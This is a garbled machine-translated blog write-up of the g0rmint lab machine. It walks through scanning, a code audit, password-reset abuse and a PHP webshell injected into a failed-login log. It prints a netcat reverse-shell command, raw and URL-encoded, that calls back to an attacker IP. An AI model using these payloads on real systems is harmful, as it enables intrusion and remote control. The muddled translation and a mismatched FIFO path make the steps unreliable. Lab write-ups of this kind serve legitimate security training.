ドローンg0rmint演習:PHP書かれた単語のログイン失敗ログリバウンドシェル、使用権限昇格の脆弱性バージョン

1.ホストが見つかりました。

2.ポートスキャン

3.アクセスポート80を見るために

案の定、404ページ、robots.txtのを見てみましょう

4.スキャンディレクトリ

スキャンdirbusterを見て

慎重にログイン画面の外観で始まり、すぐに完全なカタログにアクセスするために有用な情報を見つけることができませんでした

ソースの表示

直接アクセスしてみてくださいません、何の結果

どのような次のディレクトリのファイルをスキャン

見るために訪問を見つけるためにのみ

バックドア圧縮ファイルがあり、見にダウンロードしよう

以下を抽出した後:

5.コード監査

最も顕著な、最初のオープンを見てdb.sql

全く言及がないかどうかを確認するために(一時的ではないことを確認何暗号化)有益な情報ID、ユーザー名、電子メール、パスワードを探すlogin.php

MD5暗号化、復号化パスワードだけ

パスワードは、デモ、参照するには、ログインしています

残念ながら、ログインに失敗した場合、設定ファイルconfig.phpを見て

プロンプトが表示されたら、dummy.phpファイルを見てみましょう

障害発生前のログインもパスワードがリセット、ルックreset.phpされていることができます

以前にユーザー名とメールボックスのリセットを試して使用して見つかりました

ユーザーはだけでもそこが見つかったかどうかを確認するためにグローバル検索を電子メールで送信することができ、存在しません

ページをリセットするには、[email protected]:NOMAN、Eメール:style.cssには、ユーザー名で見つかりました

正常にリセット、暗号化を考える前に、右下の時間、ハッシュ値を参照してください、オンライン計算を見て

パスワード(緑の部分):161c7c128ce879b5371d df4684f0338188e256c6、参照するには、ログイン

ログインに成功し、パスワードのリセット

ファイル(ログへの直接アクセスhttp://192.168.109.170/g0rmint/s3cr3t-dir3ct0ry-f0r-l0gs/2020-01-04.php)、失敗したログインの記録を

6.getshell

メールボックスのログイン時に、単語の馬のPHPを挿入

ポストパラメータが提出したログイン失敗したアクセスログ

シェルリバウンド

cmd=`mkfifo /tmp/t`;
cmd=`cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.109.159 7777 >/tmp/f`;

URLエンコードした後、

cmd=%60mkfifo%20%2ftmp%2ft%60%3B
cmd=%60cat%20%2ftmp%2ff%7C%2fbin%2fsh%20-i%202%3E%261%7Cnc%20192.168.109.159%207777%20%3E%2ftmp%2ff%60%3B

オープンリスニング:NC -lvnp 7777

接続が表示権限を取得シェル、WHOAMIコマンド成功すると、猫は/ etc /問題バージョンを取得、あなたはまた、ドローンからバージョンを見ることができます

7.右に言及します

搜索版本漏洞:searchsploit ubuntu 16

后续步骤与下面链接中靶机提权步骤一致

https://blog.csdn.net/qq_41210745/article/details/103738231

发布了103 篇原创文章 · 获赞 26 · 访问量 6128

おすすめ

転載: blog.csdn.net/qq_41210745/article/details/103835074